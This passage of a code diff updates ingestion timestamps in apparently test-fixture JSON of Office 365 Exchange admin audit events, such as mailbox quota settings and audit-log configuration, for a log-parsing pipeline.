(96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -5250,7 +5250,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853310500Z", + "ingested": "2021-12-14T14:49:28.056980629Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -5331,7 +5331,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853315Z", + "ingested": "2021-12-14T14:49:28.056981075Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"2db154f6-63ae-4a31-c548-08d7adfc0d1d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -5412,7 +5412,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853320700Z", + "ingested": "2021-12-14T14:49:28.056981553Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -5493,7 +5493,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853325700Z", + "ingested": "2021-12-14T14:49:28.056982012Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -5562,7 +5562,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853332600Z", + "ingested": "2021-12-14T14:49:28.056982446Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -5632,7 +5632,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853338400Z", + "ingested": "2021-12-14T14:49:28.056982909Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -5701,7 +5701,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853344300Z", + "ingested": "2021-12-14T14:49:28.056983340Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"2cb36c1c-1368-4483-9801-08d7adfc11fe\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance15\",\"Operation\":\"Set-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"PrivacyStatementURL\",\"Value\":\"http://go.microsoft.com/fwlink/?LinkID=259417\"},{\"Name\":\"PrivacyLinkDisplayEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -5771,7 +5771,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853350400Z", + "ingested": "2021-12-14T14:49:28.056983956Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -5839,7 +5839,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853356100Z", + "ingested": "2021-12-14T14:49:28.056984489Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"a9fb5fce-4ce4-43eb-f429-08d7adfc122c\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -5909,7 +5909,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853361900Z", + "ingested": "2021-12-14T14:49:28.056985051Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"5f84ceaa-e6df-4ba1-1085-08d7ac0f4646\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -5977,7 +5977,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853367600Z", + "ingested": "2021-12-14T14:49:28.056985519Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -6047,7 +6047,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853373300Z", + "ingested": "2021-12-14T14:49:28.056986007Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -6128,7 +6128,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853379Z", + "ingested": "2021-12-14T14:49:28.056986559Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"7386959b-a0d0-459e-baf8-08d7adfc0b4b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -6209,7 +6209,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853384900Z", + "ingested": "2021-12-14T14:49:28.056987050Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -6290,7 +6290,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853390700Z", + "ingested": "2021-12-14T14:49:28.056987608Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"96b98335-ab19-4e22-31e0-08d7ac0f2ac2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 